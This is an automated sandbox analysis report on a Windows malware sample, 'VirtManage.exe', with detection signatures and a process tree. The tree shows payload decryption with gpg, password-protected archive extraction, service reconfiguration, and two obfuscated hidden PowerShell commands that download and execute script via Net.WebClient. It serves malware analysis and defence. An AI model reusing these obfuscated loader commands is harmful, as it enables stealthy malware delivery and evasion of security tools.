Windows
Analysis Report
VirtManage.exe
Overview
General Information
Detection
Score: 42 (range 0 - 100)
Confidence: 100%
Compliance
Score: 33 (range 0 - 100)
Signatures
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
.NET source code contains a domain name check
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Obfuscated command line found
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious powershell command line found
Uses whoami command line tool to query computer and username
Adds / modifies Windows certificates
Checks for available system drives (often done to infect USB drives)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses 7zip to decompress a password protected archive
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- VirtManage.exe (PID: 3452, cmdline: "C:\Users\user\Desktop\VirtManage.exe", MD5: B587A6AF7FD86EEB42425913B8D73D47)
- gpg.exe (PID: 5784, cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\5FILE.1A.gpg, MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
- conhost.exe (PID: 3056, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- gpg.exe (PID: 5520, cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\7za.dll --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\1FILE.1A.gpg, MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
- conhost.exe (PID: 6960, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- gpg.exe (PID: 2976, cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\2FILE.1A.gpg, MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
- conhost.exe (PID: 5804, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- 7za.exe (PID: 5632, cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24, MD5: C58A4193BAC738B1A88ACAD9C6A57356)
- conhost.exe (PID: 2216, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- msiexec.exe (PID: 3056, cmdline: msiexec.exe /i "C:\ProgramData\Microsoft\WindowsUpdate24\RVTools.msi", MD5: 9D09DC1EDA745A5F87553048E57620CF)
- gpg.exe (PID: 5784, cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\Cert.txt --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\3FILE.1A.gpg, MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
- conhost.exe (PID: 7084, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- w32tm.exe (PID: 6956, cmdline: w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.com, MD5: E55B6A057FDDD35A7380FB2C6811A8EC)
- conhost.exe (PID: 5704, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- w32tm.exe (PID: 7208, cmdline: w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.com, MD5: 81A82132737224D324A3E8DA993E2FB5)
- gpg.exe (PID: 7288, cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\4FILE.1A.gpg, MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
- conhost.exe (PID: 7296, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- 7za.exe (PID: 7352, cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24, MD5: C58A4193BAC738B1A88ACAD9C6A57356)
- conhost.exe (PID: 7360, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 7960, cmdline: sc config msdtc start= demand, MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
- conhost.exe (PID: 7968, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 8012, cmdline: sc config msdtc obj= "LocalSystem", MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
- conhost.exe (PID: 8020, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- oleview.exe (PID: 8164, cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe, MD5: ADB9B72679B88DDE1749E0A438222156)
- powershell.exe (PID: 8184, cmdline: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7204, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- csc.exe (PID: 1192, cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r5i403kd\r5i403kd.cmdline", MD5: F65B029562077B648A6A5F6A1AA76A66)
- cvtres.exe (PID: 7604, cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA2F.tmp" "c:\Users\user\AppData\Local\Temp\r5i403kd\CSC384ED8B1DBB445E685393158270EAB0.TMP", MD5: C877CBB966EA5939AA2A17B6A5160950)
- whoami.exe (PID: 6928, cmdline: "C:\Windows\system32\whoami.exe", MD5: A4A6924F3EAF97981323703D38FD99C4)
- msiexec.exe (PID: 5668, cmdline: C:\Windows\system32\msiexec.exe /V, MD5: E5DA170027542E25EDE42FC54C929077)
- msiexec.exe (PID: 5608, cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding B61671EC3A9141499D2D4B948D7A1ADD C, MD5: 9D09DC1EDA745A5F87553048E57620CF)
- WmiPrvSE.exe (PID: 8080, cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding, MD5: 64ACA4F48771A5BA50CD50F2410632AD)
- oleview.exe (PID: 2444, cmdline: "C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe", MD5: ADB9B72679B88DDE1749E0A438222156)
- powershell.exe (PID: 6956, cmdline: powershell.exe -windowstyle Hidden -command "SI Variable:/gO $('C:\Pro'+'gramData\Mic'+'roso'+'ft\LogUp'+'dateWi'+'ndows\Wiaph'+'oh7um.t');Set-Item Variable:/fH 'Net.WebClient';direct*;SV BO (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where{(Get-ChildItem Variable:\_).Value.Name-like'*dl*ts'}).Name).Invoke('Ne*ct')(Variable fH -Value));SI Variable:2Rn ((((Get-ChildItem Variable:/BO).Value|GM)|Where{(Get-ChildItem Variable:\_).Value.Name-like'*nl*g'}).Name);Invoke-Command(($ExecutionContext|ForEach{(Get-ChildItem Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{(GCI Variable:\_).Value.NewScriptBlock((Get-ChildItem Variable:/BO).Value.((Item Variable:/2Rn).Value).Invoke((GI Variable:/gO).Value))}}))", MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7300, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
No configs have been found
No yara matches
Sigma rule sources (authors)
- Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
- Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
- Perez Diego (@darkquassar), oscd.community
- James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger